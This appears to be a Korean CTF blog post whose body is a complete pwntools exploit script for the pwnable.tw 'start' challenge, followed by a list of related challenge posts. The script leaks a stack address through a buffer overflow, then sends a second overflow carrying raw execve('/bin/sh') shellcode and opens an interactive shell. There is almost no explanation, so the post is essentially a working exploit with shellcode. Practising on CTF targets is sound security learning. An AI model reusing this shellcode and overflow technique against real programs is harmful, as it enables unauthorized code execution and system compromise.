728x90
from pwn import *

s = process("./start")
#s = remote("chall.pwnable.tw",10000)

shell = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"


elf = ELF("./start")

doldol = 0x08048087


print s.recvuntil("Let's start the CTF:")


pay = "A" * 20
pay += p32(doldol)

s.send(pay)

stack = u32(s.recv(4))
print "stack address : %s" %str(hex(stack))


pay = "B" * 20
pay += p32(stack+0x14)
pay += "\x31\xC0\x31\xDB\x31\xC9\x31\xD2"
pay += shell

s.send(pay)


print s.recv(1024)
s.interactive()

:))

'PWN > pwnable.tw' 카테고리의 다른 글

[pwnable.tw] Death Note 250pt  (0) 2018.08.18
[pwnable.tw] seethefile 250pt  (0) 2018.08.16
[pwnable.tw] silver_bullet 200pt  (0) 2018.08.08
[pwnable.tw] calc 150pt  (0) 2018.08.08
[pwnable.tw] hacknote 200pt  (0) 2018.08.08